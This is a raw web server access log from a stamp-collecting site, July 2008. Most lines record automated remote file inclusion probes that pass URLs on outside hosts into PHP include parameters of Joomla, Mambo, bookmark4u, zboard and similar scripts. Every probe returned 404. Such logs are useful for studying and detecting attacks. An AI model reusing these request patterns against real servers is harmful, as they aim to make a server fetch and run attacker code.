81.198.180.10 - - [27/Jul/2008:21:18:55 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:21:18:55 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:21:18:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.246.28.208 - - [27/Jul/2008:21:19:29 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://213.238.52.61/coinsworld/werbung/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
62.76.116.20 - - [27/Jul/2008:21:20:35 -0700] "GET /logs/access_080616.log%20//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
61.47.2.136 - - [27/Jul/2008:21:21:34 -0700] "GET /lostpasswd.php?env[include_prefix]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:21:21:50 -0700] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.255.60.6 - - [27/Jul/2008:21:23:15 -0700] "GET /logs/access_080505.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.255.60.6 - - [27/Jul/2008:21:23:15 -0700] "GET //oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.255.60.6 - - [27/Jul/2008:21:23:15 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.255.60.6 - - [27/Jul/2008:21:24:16 -0700] "GET /logs/access_080519.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.221.130.15 - - [27/Jul/2008:21:26:12 -0700] "GET /logs/access_080609.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
212.72.200.170 - - [27/Jul/2008:21:26:41 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
61.47.2.136 - - [27/Jul/2008:21:28:12 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.47.2.136 - - [27/Jul/2008:21:28:13 -0700] "GET /lostpasswd.php?env[include_prefix]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
61.47.2.136 - - [27/Jul/2008:21:28:14 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.98.67.106 - - [27/Jul/2008:21:28:46 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
81.169.186.162 - - [27/Jul/2008:21:32:45 -0700] "GET /logs/access_080428.log//zboard//skin/zero_vote/login.php?dir=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
81.169.186.162 - - [27/Jul/2008:21:32:46 -0700] "GET //zboard//skin/zero_vote/login.php?dir=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
81.169.186.162 - - [27/Jul/2008:21:32:51 -0700] "GET //zboard//skin/zero_vote/error.php?dir=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.186.162 - - [27/Jul/2008:21:35:01 -0700] "GET //zboard//skin/zero_vote/login.php?dir=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.22.104 - - [27/Jul/2008:21:35:25 -0700] "GET /logs/access_080602.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
81.198.180.10 - - [27/Jul/2008:21:36:26 -0700] "GET /logs/access_080526.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com" 87.106.214.193